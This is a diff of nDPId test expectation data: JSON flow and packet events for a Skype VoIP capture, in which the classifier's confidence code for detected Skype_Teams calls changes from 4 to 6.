00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5rSQAAEARguHAqAEinTfrrDLdnGAAJdphnJIChjRH4yCKz81IO5fkX1qSeV8SZKk7yqqsiNY="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyo54AAEARi\/LAqAEi1cezmDLdnFcAHjAjnJQCZ2daOJDdnSgXIMa0IqUKO\/m6pw=="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1431969689525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689525,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIpxDw5sesq08OgI9xqASOJCQMAAAAgQFrAQCCApQDL\/UPiNCegEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1431969689525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689525,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n95AAEAGT8XAqAEi1cezjsObnEM6Aj3GHrKtPYAQECznJAAAAQEICj4jQrBQDL\/U"} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1431969689543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689543,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxOw5wzprYh1ADXK6ASOJDpcAAAAgQFrAQCCApMWRmAPiNCegEDAwk="} 
@@ -694,10 +694,10 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVDVAAEAGBNHAqAEinTeCsMOdnFaE5icqAAAAALAC\/\/\/EvgAAAgQFtAEDAwUBAQgKPiNGZAAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABBoHIAAEARwNrAqAEiQAQXkTLdnFgALcyQnJYCZ5BZSWZ\/iXC28\/gJa4xy6SADRNB7IBe6OkY8K1Ib90nh6Q=="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2TSkAAEARlefAqAEinTc4pTLdnFQAIg\/nnJgCnGl25qOBTIS5Gpv0M8FAGs9\/YbWac7o="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1431969690604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969690604,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWw53yBAwphOYnK6ASOJA8uAAAAgQFrAQCCApOpRObPiNGZAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1431969690604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969690604,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+KpAAEAGYGfAqAEinTeCsMOdnFaE5icr8gQMKoAQECyTZwAAAQEICj4jRt9OpROb"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -714,20 +714,20 @@ 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1431969691204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691204,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0APxAAEAGWBnAqAEinTeCrcOeAbsMd47rg+uInYAQECyCfgAAAQEICj4jSTBOp78j"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03rMAAEARUOLAqAEi1cezkTLdnFsAIONWnJoCpMZAnYkDnzYrDpEHe3Wyl3Fm6DsP"} 
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA38a4AAEARPmXAqAEinTfroDLdnFsAI2YonJwCbYbrE4NbR6JS44ONijeTgTVa37UWYcSt"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/mMEAAEARl0\/AqAEinTfrmzLdnEMAK8StnJ4Ceg13qBmaNbQ5r3u++QJg+\/7hY4I5I2kK1W2d7qoWGw0="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692087,"flow_last_seen":1431969692087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969692087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431969692087,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692087,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFBAAEAGALbAqAEinTeCsMOhAbuvVQecAAAAALAC\/\/9OOgAAAgQFtAEDAwUBAQgKPiNMnwAAAAAEAgAA"} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431969692210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969692210,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7w6FI4LuBr1UHnaASOJC+bQAAAgQFrAQCCApOpRUtPiNMnwEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431969692210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969692210,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dU1AAEAG48TAqAEinTeCsMOhAbuvVQedSOC7goAQECwVHQAAAQEICj4jTRpOpRUt"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431969692507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692507,"pkt":"0NQSxnP1PBXCt3IOCABFAABAlm8AAEARZQTAqAEib91NkjLdgQkALPOBnKACf9Ciuj22pCihR6NIjTKXTxwVlkuMzvocVlIJl4RJ8z3V"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969695483,"flow_last_seen":1431969695483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969695483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431969695483,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969695483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAoJZAAEAGGuzAqAEib91NjsOmnFcVc978AAAAALAC\/\/\/LYQAAAgQFtAEDAwUBAQgKPiNZ1AAAAAAEAgAA"} 